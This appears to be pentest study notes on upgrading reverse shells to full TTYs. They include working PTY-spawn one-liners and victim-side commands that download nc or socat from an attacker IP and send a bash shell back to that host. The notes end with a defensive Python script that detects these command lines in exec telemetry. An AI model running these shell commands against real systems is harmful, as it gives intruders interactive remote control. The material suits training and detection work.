
# Shell Balancing

### Example of a bad shell

(screenshot: example of a bad shell; image not included)

## Upgrade reverse shell to fully usable TTY shell

### rlwrap

* While receiving the connection from the target machine we can wrap the listener in `rlwrap`.
* This mitigates some of the restrictions of a poor netcat shell (no line editing, no command history) by wrapping the netcat listener with the `rlwrap` command.
* It is not installed by default, so install it with `sudo apt install rlwrap`.

```bash
rlwrap nc -lvnp $port
```

### Using env-call and script

* A generic variant: `script` logs the session to `/dev/null` and starts the shell named by the `SHELL` variable, here set to `/bin/bash`.

```bash
SHELL=/bin/bash script -q /dev/null
```

### Using Script

* `script` comes pre-installed on most Linux systems.
* Check the man page for details.
* `-q` is for quiet, `-c` is for the command to run.

```bash
/usr/bin/script -qc /bin/bash /dev/null
```

`ctrl+z`

```bash
stty raw -echo; fg; reset
```

### Python

* Python is a great tool for balancing the shell.

```bash
# on victim machine
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

`ctrl+z`

```bash
# on attacker machine
stty raw -echo
fg
```

```bash
# on victim machine
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```

### Perl

* If Python is not installed but Perl is available on the box, we can use this instead.

```bash
perl -e 'exec "/bin/sh";'
```

### Ruby

* If Ruby is installed on the box.

```bash
exec "/bin/sh"                # as a Ruby expression

ruby -e 'exec "/bin/sh"'      # as a one-liner
```

### Lua

```bash
lua -e "os.execute('/bin/sh')"
```

### Copy over NC and spawn a shell

* Using `wget` and Python's `SimpleHTTPServer`, `nc` can easily be moved over to the target.
* Here we copy `nc` to the victim machine and then receive the shell.

```bash
# Attacker Machine

# serve nc from the current directory; stop the server (ctrl+c) once it has been downloaded
cp /usr/bin/nc . ; python -m SimpleHTTPServer 9998
# then reuse the port for the listener
nc -nlvp 9998
```

```bash
# Victim Machine

cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9998 -e /bin/bash
```

### Socat

* Never use `nc` while receiving connections; use `socat` instead, which gives a more complete shell, much like SSH.

```bash
# Attacker Machine

socat file:`tty`,raw,echo=0 TCP-L:1234
```

```bash
# Victim Machine

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234

# if socat is not present, we can fetch the static binary
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
```

* Resource - <https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat>
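From the defender's side, every upgrade one-liner on this page leaves a distinctive command line in process telemetry. The script below is an added example, not part of the original notes: it runs a small rule set over constructed execve-style records (pid and joined argv, as auditd or eBPF exec tracing would provide) and flags the interpreter-spawns-PTY, `script`-to-`/dev/null`, and socat/nc-hands-shell-to-socket patterns shown above while leaving benign look-alikes alone.

```python
"""Detection-side counterpart to the shell-upgrade one-liners on this page.

Added example, not from the original notes. Records are constructed; in
production they would come from auditd EXECVE events or eBPF exec tracing.
"""
import re

# (label, regex over the joined argv). Quotes are optional because audit
# records carry argv after the calling shell has already stripped them.
PTY_UPGRADE_RULES = [
    ("python pty.spawn",     re.compile(r"\bpython[23]?\b.*\bpty\.spawn\(")),
    ("script to /dev/null",  re.compile(r"(?:^|[/\s])script\s.*\s/dev/null\b")),
    ("perl/ruby exec shell", re.compile(r"\b(?:perl|ruby)\s+-e\s+['\"]?exec\s+['\"]?/bin/(?:ba)?sh")),
    ("lua os.execute shell", re.compile(r"\blua\b.*os\.execute\(['\"]?/bin/(?:ba)?sh")),
    ("socat exec with pty",  re.compile(r"\bsocat\b.*exec:['\"]?(?:ba)?sh.*\bpty\b")),
    ("nc -e shell",          re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh")),
]

SAMPLE_EXECVE = [  # constructed records, not real telemetry
    {"pid": 4101, "cmdline": 'python3 -c import pty;pty.spawn("/bin/bash")'},
    {"pid": 4102, "cmdline": "/usr/bin/script -qc /bin/bash /dev/null"},
    {"pid": 4103, "cmdline": 'perl -e exec "/bin/sh";'},
    {"pid": 4104, "cmdline": "lua -e os.execute('/bin/sh')"},
    {"pid": 4105, "cmdline": "/tmp/socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234"},
    {"pid": 4106, "cmdline": "./nc 10.0.0.1 9998 -e /bin/bash"},
    # benign look-alikes that must not fire
    {"pid": 4201, "cmdline": "python3 manage.py runserver"},
    {"pid": 4202, "cmdline": "script -q build-session.log"},
    {"pid": 4203, "cmdline": "socat TCP-LISTEN:8080,fork TCP:127.0.0.1:80"},
    {"pid": 4204, "cmdline": "nc -zv 10.0.0.5 443"},
]


def scan_cmdlines(records):
    """Return (pid, label, cmdline) for every record matching a rule."""
    hits = []
    for rec in records:
        for label, rx in PTY_UPGRADE_RULES:
            if rx.search(rec["cmdline"]):
                hits.append((rec["pid"], label, rec["cmdline"]))
                break  # the first matching rule is enough per process
    return hits


if __name__ == "__main__":
    for pid, label, cmd in scan_cmdlines(SAMPLE_EXECVE):
        print(f"pid {pid}: {label}: {cmd}")
```

The rules are deliberately narrow so a legitimate `script -q session.log` or a socat port forward does not fire; pair the hits with parent-process context (a shell spawned under a web-server worker) to raise confidence.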